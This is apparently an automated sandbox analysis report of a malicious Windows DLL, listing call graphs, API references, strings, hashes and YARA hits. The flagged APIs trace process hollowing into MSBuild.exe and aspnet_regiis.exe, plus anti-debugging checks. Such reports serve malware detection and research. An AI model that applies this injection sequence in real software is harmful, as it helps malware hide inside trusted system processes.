11407->11403 11408 6e81150a 11409 6e811516 ___scrt_is_nonwritable_in_current_image 11408->11409 11421 6e811b83 EnterCriticalSection 
11409->11421 11411 6e811520 11422 6e811740 11411->11422 11413 6e811533 11426 6e811553 11413->11426 11416->11405 11420 6e811bcb LeaveCriticalSection 11417->11420 11419 6e8114ec 11419->11408 11420->11419 11421->11411 11423 6e81174f _unexpected 11422->11423 11425 6e811776 _unexpected 11422->11425 11423->11425 11429 6e8144a0 11423->11429 11425->11413 11539 6e811bcb LeaveCriticalSection 11426->11539 11428 6e811541 11428->11373 11430 6e814520 11429->11430 11434 6e8144b6 11429->11434 11431 6e81456e 11430->11431 11433 6e811c30 __freea 14 API calls 11430->11433 11497 6e814611 11431->11497 11435 6e814542 11433->11435 11434->11430 11436 6e8144e9 11434->11436 11441 6e811c30 __freea 14 API calls 11434->11441 11437 6e811c30 __freea 14 API calls 11435->11437 11438 6e81450b 11436->11438 11445 6e811c30 __freea 14 API calls 11436->11445 11439 6e814555 11437->11439 11440 6e811c30 __freea 14 API calls 11438->11440 11444 6e811c30 __freea 14 API calls 11439->11444 11446 6e814515 11440->11446 11443 6e8144de 11441->11443 11442 6e81457c 11447 6e8145dc 11442->11447 11456 6e811c30 14 API calls __freea 11442->11456 11457 6e8147bd 11443->11457 11449 6e814563 11444->11449 11450 6e814500 11445->11450 11451 6e811c30 __freea 14 API calls 11446->11451 11452 6e811c30 __freea 14 API calls 11447->11452 11454 6e811c30 __freea 14 API calls 11449->11454 11485 6e8148bb 11450->11485 11451->11430 11453 6e8145e2 11452->11453 11453->11425 11454->11431 11456->11442 11458 6e8147ce 11457->11458 11484 6e8148b7 11457->11484 11460 6e8147df 11458->11460 11461 6e811c30 __freea 14 API calls 11458->11461 11459 6e8147f1 11463 6e814803 11459->11463 11464 6e811c30 __freea 14 API calls 11459->11464 11460->11459 11462 6e811c30 __freea 14 API calls 11460->11462 11461->11460 11462->11459 11465 6e814815 11463->11465 11466 6e811c30 __freea 14 API calls 11463->11466 11464->11463 11467 6e814827 11465->11467 11469 6e811c30 __freea 14 API calls 11465->11469 11466->11465 11468 6e814839 11467->11468 11470 6e811c30 __freea 14 API 
calls 11467->11470 11471 6e81484b 11468->11471 11472 6e811c30 __freea 14 API calls 11468->11472 11469->11467 11470->11468 11473 6e81485d 11471->11473 11474 6e811c30 __freea 14 API calls 11471->11474 11472->11471 11475 6e81486f 11473->11475 11477 6e811c30 __freea 14 API calls 11473->11477 11474->11473 11476 6e814881 11475->11476 11478 6e811c30 __freea 14 API calls 11475->11478 11479 6e814893 11476->11479 11480 6e811c30 __freea 14 API calls 11476->11480 11477->11475 11478->11476 11481 6e8148a5 11479->11481 11482 6e811c30 __freea 14 API calls 11479->11482 11480->11479 11483 6e811c30 __freea 14 API calls 11481->11483 11481->11484 11482->11481 11483->11484 11484->11436 11486 6e814920 11485->11486 11487 6e8148c8 11485->11487 11486->11438 11488 6e8148d8 11487->11488 11490 6e811c30 __freea 14 API calls 11487->11490 11489 6e8148ea 11488->11489 11491 6e811c30 __freea 14 API calls 11488->11491 11492 6e8148fc 11489->11492 11493 6e811c30 __freea 14 API calls 11489->11493 11490->11488 11491->11489 11494 6e81490e 11492->11494 11495 6e811c30 __freea 14 API calls 11492->11495 11493->11492 11494->11486 11496 6e811c30 __freea 14 API calls 11494->11496 11495->11494 11496->11486 11498 6e81463d 11497->11498 11499 6e81461e 11497->11499 11498->11442 11499->11498 11503 6e814949 11499->11503 11502 6e811c30 __freea 14 API calls 11502->11498 11504 6e814637 11503->11504 11505 6e81495a 11503->11505 11504->11502 11506 6e814924 _unexpected 14 API calls 11505->11506 11507 6e814962 11506->11507 11508 6e814924 _unexpected 14 API calls 11507->11508 11509 6e81496d 11508->11509 11510 6e814924 _unexpected 14 API calls 11509->11510 11511 6e814978 11510->11511 11512 6e814924 _unexpected 14 API calls 11511->11512 11513 6e814983 11512->11513 11514 6e814924 _unexpected 14 API calls 11513->11514 11515 6e814991 11514->11515 11516 6e811c30 __freea 14 API calls 11515->11516 11517 6e81499c 11516->11517 11518 6e811c30 __freea 14 API calls 11517->11518 11519 6e8149a7 11518->11519 11520 6e811c30 __freea 14 API calls 
11519->11520 11521 6e8149b2 11520->11521 11522 6e814924 _unexpected 14 API calls 11521->11522 11523 6e8149c0 11522->11523 11524 6e814924 _unexpected 14 API calls 11523->11524 11525 6e8149ce 11524->11525 11526 6e814924 _unexpected 14 API calls 11525->11526 11527 6e8149df 11526->11527 11528 6e814924 _unexpected 14 API calls 11527->11528 11529 6e8149ed 11528->11529 11530 6e814924 _unexpected 14 API calls 11529->11530 11531 6e8149fb 11530->11531 11532 6e811c30 __freea 14 API calls 11531->11532 11533 6e814a06 11532->11533 11534 6e811c30 __freea 14 API calls 11533->11534 11535 6e814a11 11534->11535 11536 6e811c30 __freea 14 API calls 11535->11536 11537 6e814a1c 11536->11537 11538 6e811c30 __freea 14 API calls 11537->11538 11538->11504 11539->11428 11541 6e80ea8d 11540->11541 11547 6e80bfec 11540->11547 11548 6e80f155 11541->11548 11544 6e80f190 ___vcrt_FlsSetValue 6 API calls 11545 6e80eaa3 11544->11545 11553 6e80ea67 11545->11553 11547->11250 11549 6e80eff4 ___vcrt_InitializeCriticalSectionEx 5 API calls 11548->11549 11550 6e80f16f 11549->11550 11551 6e80f187 TlsGetValue 11550->11551 11552 6e80ea94 11550->11552 11551->11552 11552->11544 11554 6e80ea71 11553->11554 11555 6e80ea7e 11553->11555 11554->11555 11556 6e810543 ___std_type_info_destroy_list 14 API calls 11554->11556 11555->11547 11556->11555 11563 6e80eabc 11557->11563 11559 6e80bfc8 11559->11273 11560 6e811200 11559->11560 11561 6e811908 __dosmaperr 14 API calls 11560->11561 11562 6e80bfd4 11561->11562 11562->11276 11562->11277 11564 6e80eac5 11563->11564 11565 6e80eac8 GetLastError 11563->11565 11564->11559 11566 6e80f155 ___vcrt_FlsGetValue 6 API calls 11565->11566 11567 6e80eadd 11566->11567 11568 6e80eafc 11567->11568 11569 6e80eb42 SetLastError 11567->11569 11570 6e80f190 ___vcrt_FlsSetValue 6 API calls 11567->11570 11568->11569 11569->11559 11571 6e80eaf6 __InternalCxxFrameHandler 11570->11571 11571->11568 11572 6e80eb1e 11571->11572 11573 6e80f190 ___vcrt_FlsSetValue 6 API calls 11571->11573 11574 
6e80f190 ___vcrt_FlsSetValue 6 API calls 11572->11574 11575 6e80eb32 11572->11575 11573->11572 11574->11575 11576 6e810543 ___std_type_info_destroy_list 14 API calls 11575->11576 11576->11568
APIs
• GetConsoleWindow.KERNELBASE ref: 6E7FF193
• ShowWindow.USER32 ref: 6E7FF1A9
• VirtualAlloc.KERNELBASE(?,?,?,?,?), ref: 6E7FF2E3
• CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6E7FF43E
• VirtualAllocEx.KERNELBASE(?,?,?,?,?,?), ref: 6E7FF618
• VirtualAllocEx.KERNEL32(?,?,?,?,?,?), ref: 6E7FF779
• WriteProcessMemory.KERNELBASE(?,?,?,?,?,?,?), ref: 6E7FF828
• WriteProcessMemory.KERNELBASE ref: 6E7FFA61
• ReadProcessMemory.KERNEL32 ref: 6E80042D
• WriteProcessMemory.KERNEL32(?,?,?,?,?,?), ref: 6E8004B3
• WriteProcessMemory.KERNELBASE(?,?,?,?,?,?), ref: 6E8008C4
• Wow64SetThreadContext.KERNEL32 ref: 6E800914
• ResumeThread.KERNELBASE ref: 6E800991
• CloseHandle.KERNEL32 ref: 6E800A2C
• CloseHandle.KERNEL32 ref: 6E800A40
• WriteProcessMemory.KERNEL32(?,?,?,?,?,?,?), ref: 6E800F54
• ResumeThread.KERNEL32 ref: 6E8010B9
Memory Dump Source
• Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
• Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
Similarity
• API ID: Process$Memory$Write$AllocThreadVirtual$CloseHandleResumeWindow$ConsoleContextCreateReadShowWow64
• String ID: "wC$$`[2$57($:/U|$;}UH$?35$@$C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe$D$G*d)$G*d)$N3`$N3`$Vs$Y*J$Y*J$\ion$kernel32.dll$ntdll.dll$onA $o}La$rRNe$tof$|M+$}mH$0*|
• API String ID: 1613124053-3344266483
Similarity
• API ID: Handle$Close$File$CreateModule$CurrentMappingNameProcessProtectVirtual
• String ID: @$O>&|$}mH
• API String ID: 4094253665-349066882

Similarity
• API ID: HandleModule
• String ID: 7`7$7`7$NtQueryInformationProcess$O&Y0$P/hJ$P/hJ$ntdll.dll$pUNS$pUNS$}mH
• API String ID: 4139908857-1130171200

APIs
• __RTC_Initialize.LIBCMT ref: 6E80BB05
• ___scrt_uninitialize_crt.LIBCMT ref: 6E80BB1F
Similarity
• API ID: Initialize___scrt_uninitialize_crt
• String ID:
• API String ID: 2442719207-0

Similarity
• API ID: dllmain_raw$dllmain_crt_dispatch
• String ID:
• API String ID: 3136044242-0

                                                                                                                                                                    Control-flow Graph (figure not reproduced; legend: Executed / Not Executed)
                                                                                                                                                                    APIs
                                                                                                                                                                    • __RTC_Initialize.LIBCMT ref: 6E80BA04
                                                                                                                                                                      • Part of subcall function 6E80BED3: InitializeSListHead.KERNEL32(6E880CC0,6E80BA0E,6E81ED80,00000010,6E80B99F,?,?,?,6E80BBC7,?,00000001,?,?,00000001,?,6E81EDC8), ref: 6E80BED8
                                                                                                                                                                    • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6E80BA6E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3231365870-0

                                                                                                                                                                    Control-flow Graph (figure not reproduced; legend: Executed / Not Executed)
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 6E81392D
                                                                                                                                                                    • GetFileType.KERNELBASE(00000000), ref: 6E81393F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileHandleType
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3000768030-0
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: %p;2$%p;2$}mH
                                                                                                                                                                    • API String ID: 0-4058848594
                                                                                                                                                                    APIs
                                                                                                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6E810294
                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6E81029E
                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6E8102AB
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                    • String ID: }mH
                                                                                                                                                                    • API String ID: 3906539128-246349140
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: =M$N!"5$N!"5$zi2$}mH
                                                                                                                                                                    • API String ID: 0-1452745638
                                                                                                                                                                    APIs
                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 6E80C1FE
                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 6E80C2CA
                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6E80C2E3
                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?), ref: 6E80C2ED
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 254469556-0
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: ?R$$^^p$^^p$}mH
                                                                                                                                                                    • API String ID: 0-3687332255
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: sS2;$v)8d$v)8d$}mH
                                                                                                                                                                    • API String ID: 0-621835856
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: #h>$#h>$}mH
                                                                                                                                                                    • API String ID: 0-2102491416
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: }mH
                                                                                                                                                                    • API String ID: 0-246349140
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: 2]<8$2]<8
                                                                                                                                                                    • API String ID: 0-4277245287
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: Unknown exception$}mH
                                                                                                                                                                    • API String ID: 0-3621796645
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: AM|$AM|
                                                                                                                                                                    • API String ID: 0-2112996108
                                                                                                                                                                    • Opcode ID: 374058d4cb57a359c1705f2956a9cedd11224bb4f88026da16632eb22c2f51be
                                                                                                                                                                    • Instruction ID: adfadda29a3ad05ceff0b1fd12522be33ceecb34bf72ba6c2000f11ac5e9a024
                                                                                                                                                                    • Opcode Fuzzy Hash: 374058d4cb57a359c1705f2956a9cedd11224bb4f88026da16632eb22c2f51be
                                                                                                                                                                    • Instruction Fuzzy Hash: 2BA12676A6411A8FCF04CEFCCD917DE77F2BB46320F106A19D821E7B84C62A9949DB10
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: }mH$QB
                                                                                                                                                                    • API String ID: 0-1228090609
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: @B_a$}mH
                                                                                                                                                                    • API String ID: 0-313790564
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: }mH
                                                                                                                                                                    • API String ID: 0-246349140
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: }mH
                                                                                                                                                                    • API String ID: 0-246349140
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: }mH
                                                                                                                                                                    • API String ID: 0-246349140
                                                                                                                                                                    APIs
                                                                                                                                                                    • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6E818510,?,?,00000008,?,?,6E818113,00000000), ref: 6E818742
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExceptionRaise
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3997070919-0
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: }mH
                                                                                                                                                                    • API String ID: 0-246349140
                                                                                                                                                                    APIs
                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6E80C3CE
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FeaturePresentProcessor
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2325560087-0
                                                                                                                                                                    • Opcode ID: 7c1fa876f964d69fd6f113033959544e8929593e5fda70c9e20efe7c655c7906
                                                                                                                                                                    • Instruction ID: a0fcffc76f05173b5fe61d2bbcc0f4cf484aa21aa4ffedf5162240597511753c
                                                                                                                                                                    • Opcode Fuzzy Hash: 7c1fa876f964d69fd6f113033959544e8929593e5fda70c9e20efe7c655c7906
                                                                                                                                                                    • Instruction Fuzzy Hash: 83518871915A058FFB45CF99C9917AEBBF1FB46310F208629D819FB286E3749904CFA0
                                                                                                                                                                    Strings
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: }mH
                                                                                                                                                                    • API String ID: 0-246349140
                                                                                                                                                                    • Opcode ID: 36156879b80a34df416ba78fb2dfe5278f8e8f41f5de9363b0874d3828cf6abf
                                                                                                                                                                    • Instruction ID: 6d645273dae914b584c8a9ba88b89c33b87ecfec6eba241b02c3bee7a4152126
                                                                                                                                                                    • Opcode Fuzzy Hash: 36156879b80a34df416ba78fb2dfe5278f8e8f41f5de9363b0874d3828cf6abf
                                                                                                                                                                    • Instruction Fuzzy Hash: 35B1D036A4461ACFCF04CEFCCD99BDEB7F2AB4A310F10481AE815A7395C6798D098B10
                                                                                                                                                                    Strings
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: }mH
                                                                                                                                                                    • API String ID: 0-246349140
                                                                                                                                                                    • Opcode ID: 141e03015ed8076e973798ebefc1f0f563531356b612e6d27a9b75a648d308a6
                                                                                                                                                                    • Instruction ID: 32e18e3e11d5c7e961072ba3aaf82fb8425e10e783f5a8a71faddacca01dcd9b
                                                                                                                                                                    • Opcode Fuzzy Hash: 141e03015ed8076e973798ebefc1f0f563531356b612e6d27a9b75a648d308a6
                                                                                                                                                                    • Instruction Fuzzy Hash: 97A1DE71A45209CFCB04CFECE9907DDBBF2AF4A324F005A1AE815E7396C6799949CB50
                                                                                                                                                                    Strings
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: }mH
                                                                                                                                                                    • API String ID: 0-246349140
                                                                                                                                                                    • Opcode ID: af719a4eb8558e1872ee850e672d834720a85c7bedce4b74a4f2130e3bedc59d
                                                                                                                                                                    • Instruction ID: 6c9044526fe063af170284e858941140d08b72005e0deecd922737fa34a06f7e
                                                                                                                                                                    • Opcode Fuzzy Hash: af719a4eb8558e1872ee850e672d834720a85c7bedce4b74a4f2130e3bedc59d
                                                                                                                                                                    • Instruction Fuzzy Hash: 9091DF76A542099FDF04CFECC9907CEBBF1EB0A324F101919E910EB794C239A884DB95
                                                                                                                                                                    Strings
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: }mH
                                                                                                                                                                    • API String ID: 0-246349140
                                                                                                                                                                    • Opcode ID: de5dfd8dc29e2f09c013e061152fba2e24c5ef13cf6c31f923f9da24cf350cda
                                                                                                                                                                    • Instruction ID: c47a43026359654c3c87999ca1d66d08d2cd70a4c300267d80887db8a726de33
                                                                                                                                                                    • Opcode Fuzzy Hash: de5dfd8dc29e2f09c013e061152fba2e24c5ef13cf6c31f923f9da24cf350cda
                                                                                                                                                                    • Instruction Fuzzy Hash: C181D075A04609CFDF04CEBCEA917DEBBF2AB4A355F108115D821EB364C6399D0ACB61
                                                                                                                                                                    Strings
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: }mH
                                                                                                                                                                    • API String ID: 0-246349140
                                                                                                                                                                    • Opcode ID: 886924fa1012dad168daf32a00e775341aa8cb6afd5a7cf9167843becbcdc71c
                                                                                                                                                                    • Instruction ID: d71c47c2ea7054f7d5590087ea57434cdb2ef86299599640535daae7111dca87
                                                                                                                                                                    • Opcode Fuzzy Hash: 886924fa1012dad168daf32a00e775341aa8cb6afd5a7cf9167843becbcdc71c
                                                                                                                                                                    • Instruction Fuzzy Hash: A341E375E4060A8FCF04CEFCC9A13EE77F5AB0A324F105919D821EB790C7399A098B91
                                                                                                                                                                    Strings
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: }mH
                                                                                                                                                                    • API String ID: 0-246349140
                                                                                                                                                                    • Opcode ID: 3c2406594f738d380bbe804b88ac711f9ca084ee798320afd050731cb899fd61
                                                                                                                                                                    • Instruction ID: cfab65b71b9d82331a8ff862292ae4a9686199a19fa9eed76f1ad23411431daa
                                                                                                                                                                    • Opcode Fuzzy Hash: 3c2406594f738d380bbe804b88ac711f9ca084ee798320afd050731cb899fd61
                                                                                                                                                                    • Instruction Fuzzy Hash: 2D411976A446098FDF14CFFCC9A13EF7BF2AB07321F105919C915AB384C62A45098BB0
                                                                                                                                                                    Strings
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: ,w
                                                                                                                                                                    • API String ID: 0-61532519
                                                                                                                                                                    • Opcode ID: a6e726e4af18339a7a4d74d7b79f0dbb6ff97a343f5f487ff1ced51552f165d4
                                                                                                                                                                    • Instruction ID: 9aa7167c218a749ae46787da9854834292325dcefa40bec0220406aa0836efa9
                                                                                                                                                                    • Opcode Fuzzy Hash: a6e726e4af18339a7a4d74d7b79f0dbb6ff97a343f5f487ff1ced51552f165d4
                                                                                                                                                                    • Instruction Fuzzy Hash: 2B41B676A141068FCB08CEFCCA952EE7BE29B62360F144329D935EB3E4C6358906C785
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: HeapProcess
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 54951025-0
                                                                                                                                                                    • Opcode ID: 52e793b4c9345d7a3976a2f7d0e356f763d8a56f2a797e2a250207e2e3dbab8b
                                                                                                                                                                    • Instruction ID: 136ba4b8421eb5f9a313a59ecac1a3f12f631c51b9daf71038448fc22325e414
                                                                                                                                                                    • Opcode Fuzzy Hash: 52e793b4c9345d7a3976a2f7d0e356f763d8a56f2a797e2a250207e2e3dbab8b
                                                                                                                                                                    • Instruction Fuzzy Hash: 9CA012302016018B4B008E34430A24A369855039807000024940CC0450EB244440C641
                                                                                                                                                                    • Instruction Fuzzy Hash: 7E318B32A8051A8FCF04CEFDC9A53EF77E29703320F125919C965DB6A7C66E450E8792

                                                                                                                                                                    APIs
                                                                                                                                                                    • type_info::operator==.LIBVCRUNTIME ref: 6E80F58B
                                                                                                                                                                    • ___TypeMatch.LIBVCRUNTIME ref: 6E80F699
                                                                                                                                                                    • _UnwindNestedFrames.LIBCMT ref: 6E80F7EB
                                                                                                                                                                    • CallUnexpected.LIBVCRUNTIME ref: 6E80F806
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2153602808.000000006E880000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2153902117.000000006E882000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e7f0000_file.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                    • String ID: csm$csm$csm
                                                                                                                                                                    • API String ID: 2751267872-393685449
                                                                                                                                                                    • Opcode ID: 88fd50f85d4f033c25be4c660d09159699fe1a0ad12e51331df6e6dc2be219a7
                                                                                                                                                                    • Instruction ID: bf97d1733f1d93b43168c83456ddf94357961d6c99773866e7885940f6cbb40e
                                                                                                                                                                    • Opcode Fuzzy Hash: 88fd50f85d4f033c25be4c660d09159699fe1a0ad12e51331df6e6dc2be219a7
                                                                                                                                                                    • Instruction Fuzzy Hash: 93B1797180020AEFDF15CFE8CC8099EB7B9FF68314B20895AE8106B255D735DA51CF96

                                                                                                                                                                    APIs
                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 6E815279
                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 6E815342
                                                                                                                                                                    • __freea.LIBCMT ref: 6E8153A9
                                                                                                                                                                      • Part of subcall function 6E811BE2: HeapAlloc.KERNEL32(00000000,6E812BEC,?,?,6E812BEC,00000220,?,00000000,?), ref: 6E811C14
                                                                                                                                                                    • __freea.LIBCMT ref: 6E8153BC
                                                                                                                                                                    • __freea.LIBCMT ref: 6E8153C9
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2153452626.000000006E7F1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6E7F0000, based on PE: true
                                                                                                                                                                     • Associated: 00000000.00000002.2153275754.000000006E7F0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2153555317.000000006E819000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                     • Associated: 00000000.00000002.2153602808.000000006E820000.00000004.00000001.01000000.00000007.sdmp
